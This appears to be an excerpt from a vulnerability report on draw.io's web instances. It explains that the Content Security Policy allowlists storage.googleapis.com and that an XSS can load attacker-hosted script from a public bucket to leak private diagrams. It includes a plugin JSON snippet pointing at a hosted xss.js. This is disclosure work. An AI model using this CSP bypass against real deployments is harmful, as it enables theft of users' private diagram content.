Drawio WEB instancesn allows https://storage.googleapis.com
in CSP script-src
, abusing the XSS found in this report, it is possible to bypass the CSP and leak private diagram content.
On the web application side, the javascript execution is protected by the following CSP:
...
script-src https://www.dropbox.com https://api.trello.com 'self' https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes=' 'sha256-r/ILW7KMSJxeo9EYqCTzZyCT0PZ9gHN1BLgki7vpR+A=' 'sha256-5DtSB5mj34lxcEf+HFWbBLEF49xxJaKnWGDWa/utwQA=' 'sha256-vS/MxlVD7nbY7AnV+0t1Ap338uF7vrcs7y23KjERhKc='
...
Because it allows you to load script from https://storage.googleapis.com
which is the public URL for Google Cloud Bucket, it is possible to use it to execute our code.
{
"plugins": [
"https://storage.googleapis.com/bypass_csp/xss.js"
]
}